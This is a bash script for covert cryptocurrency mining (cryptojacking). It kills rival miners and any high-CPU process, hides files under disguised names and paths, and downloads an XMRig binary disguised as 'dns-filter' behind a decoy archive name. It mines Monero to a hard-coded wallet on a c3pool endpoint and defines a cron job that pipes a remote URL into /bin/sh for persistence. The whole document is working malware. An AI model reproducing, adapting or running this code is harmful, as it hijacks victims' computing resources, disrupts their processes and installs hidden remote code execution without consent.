#!/bin/bash
for file in \
"${HOME_1}/systemdev/dns-filter" \
/usr/lib/systemdev/dns-filter \
/usr/lib/dev/systemdev/dns-filter
do
[ -f "$file" ] && rm -f "$file"
done
CUSTOM_ARG="${1:-x}"
external_ip=$(wget -qO- ipv4.icanhazip.com 2>/dev/null \
|| curl -s ipv4.icanhazip.com 2>/dev/null)
IDOFPC=$(echo "$external_ip" | sed 's/\./-/g' | cut -c -6)
if systemctl is-active --quiet systemd_s; then
systemctl stop systemd_s
fi
kill_unwanted() {
if command -v pkill >/dev/null 2>&1; then
pkill -f "index.js"
pkill "xmr"
elif command -v pgrep >/dev/null 2>&1; then
pgrep -f "index.js" | xargs -r kill
pgrep -x "xmr" | xargs -r kill
else
ps aux | grep '[x]mr' | awk '{print $2}' | xargs -r kill
ps aux | grep -w '[i]ndex.js' | awk '{print $2}' | xargs -r kill
fi
if command -v pgrep >/dev/null 2>&1; then
pgrep "index.js" | grep -v "^$$" | xargs -r kill
else
ps aux | grep -w '[i]ndex.js' \
| awk -v mypid=$$ '$2 != mypid {print $2}' \
| xargs -r kill
fi
}
kill_unwanted
kill_high_cpu_processes() {
local threshold=150.0
local exclude_patterns=("pattern2reserve333" "goAwgBCFH")
local pid cpu cmdline
ps -eo pid,%cpu --sort=-%cpu \
| awk -v threshold="$threshold" 'NR>1 && $2 > threshold {print $1}' \
| while read -r pid; do
if [ -f "/proc/$pid/cmdline" ]; then
cmdline=$(tr '\0' ' ' < "/proc/$pid/cmdline")
else
echo "PID $pid died before inspection"
continue
fi
for pattern in "${exclude_patterns[@]}"; do
if [[ "$cmdline" == *"$pattern"* ]]; then
echo "Excluding PID $pid (matched '$pattern')"
continue 2
fi
done
if kill -9 "$pid" 2>/dev/null; then
echo "Killed PID $pid"
else
echo "Failed to kill PID $pid (already dead or permission denied)"
fi
done
}
kill_high_cpu_processes
_sfx_path() {
if [ "$(id -u)" -eq 0 ]; then
printf '/var/lib/.sysconf_id'
else
printf '%s/.cache/.sysid' "${HOME:-/tmp}"
fi
}
_load_or_gen_sfx() {
local _f _s
_f=$(_sfx_path)
if [ -f "$_f" ] && [ -s "$_f" ]; then
cat "$_f"
return
fi
_s=$(tr -dc 'a-z0-9' </dev/urandom 2>/dev/null | head -c4)
[ -z "$_s" ] && _s=$(awk 'BEGIN{srand(); printf "%04x", int(rand()*65535)}')
mkdir -p "$(dirname "$_f")" 2>/dev/null
printf '%s' "$_s" >"$_f" 2>/dev/null
printf '%s' "$_s"
}
_SFX=$(_load_or_gen_sfx)
if [ "$(id -u)" -eq 0 ]; then
HOME_1="/usr_${_SFX}/lib/dev"
user_type="root"
if ! command -v cron >/dev/null 2>&1; then
echo "Installing cron..."
if command -v apt-get >/dev/null 2>&1; then apt-get update && apt-get install -y cron
elif command -v yum >/dev/null 2>&1; then yum install -y cronie
else echo "No package manager found for cron install"
fi
fi
else
HOME_1="${HOME:-/tmp}/.usr_${_SFX}/lib"
user_type="user"
fi
mkdir -p "${HOME_1}/systemdev"
program_file="$HOME_1/systemdev/dns-filter"
MINING_POOL="auto.c3pool.org:443"
WALLET="883kAB7UfoJCKPzZAavUCHJdH4L2qVjqw4A79diUrFjBWBFrerhXPFbbUZnY2CemcUiBcLpAUz38vVYBbUqTHAgoAwgBCFH"
run_program() {
local executable="$program_file"
local fallback_executable="${HOME_1}/dns-filter"
# Returns 0 if the process is still alive after 5 seconds
launch_program() {
nohup "$@" >/dev/null 2>&1 &
local pid=$!
sleep 0.5
ps -p "$pid" >/dev/null 2>&1 || return 1
sleep 4.5
ps -p "$pid" >/dev/null 2>&1
}
download_fallback() {
rm -f "$fallback_executable"
if command -v curl >/dev/null 2>&1; then
curl -k -fL -o "$fallback_executable" "$XMRIG_URL" || return 1
elif command -v wget >/dev/null 2>&1; then
wget -qO "$fallback_executable" "$XMRIG_URL" || return 1
else
echo "No download tool available" >&2; return 1
fi
chmod +x "$fallback_executable"
}
echo "Starting primary miner..."
if [ -x "$executable" ]; then
if launch_program "$executable" -o "$MINING_POOL" -u "$WALLET" -p "$CUSTOM_ARG"; then
echo "Primary miner running (PID $!)"
return 0
else
echo "Primary miner crashed immediately"
fi
else
echo "Primary miner binary not found/executable"
fi
echo "Attempting fallback download..."
if download_fallback && launch_program "$fallback_executable" -o "$MINING_POOL" -u "$WALLET" -p "$CUSTOM_ARG"; then
echo "Fallback miner running (PID $!)"
else
echo "Warning: All startup attempts failed"
fi
return 0
}
if [ -e "$program_file" ]; then
echo "Miner binary already present at: $program_file"
run_program
pkill -f "systemd-t"
else
echo "Downloading miner binary..."
if command -v wget &>/dev/null; then
wget -qO "$HOME_1/systemdev/yes.tar.xz" "$XMRIG_URL"
elif command -v curl &>/dev/null; then
curl -k -L -o "$HOME_1/systemdev/yes.tar.xz" "$XMRIG_URL"
else
echo "Error: neither wget nor curl available."; exit 1
fi
# Binary is saved directly (no actual tar extraction — the .tar.xz name is a decoy)
mv "$HOME_1/systemdev/yes.tar.xz" "$program_file"
rm -rf "$HOME_1/systemdev/xmrig"
chmod +x "$program_file"
if [ -x "$program_file" ]; then
echo "Miner installed at: $program_file"
run_program
else
echo "Error: install failed at $program_file"
echo "Machine: ($external_ip) - $user_type"
fi
fi
create_cronjob() {
local url="$1"
local cron_command
if command -v curl >/dev/null; then
cron_command="/bin/sh -c 'curl -fsSLk $url | tr -d '\''\r'\'' | /bin/sh'"
elif command -v wget >/dev/null; then
cron_command="/bin/sh -c 'wget -qO- $url | tr -d '\''\r'\'' | /bin/sh'"
else
echo "Error: cannot create cron job."; return 1
fi
# Adds entry, deduplicating by URL first
(crontab -l 2>/dev/null | grep -vF "$url"; echo "*/75 * * * * $cron_command") | crontab -
echo "Cron persistence installed."
}
rm -f /tmp/mon.sh
rm -f /tmp/run.sh
delete_systemd_mon_file() {
if [ "$(id -u)" -eq 0 ]; then
file_path="/usr/lib/systemdev/dns-filter"
else
file_path="/tmp/usr/lib/systemdev/dns-filter"
fi
if [ -e "$file_path" ]; then
rm "$file_path"
echo "File deleted: $file_path"
else
echo "File does not exist: $file_path"
fi
}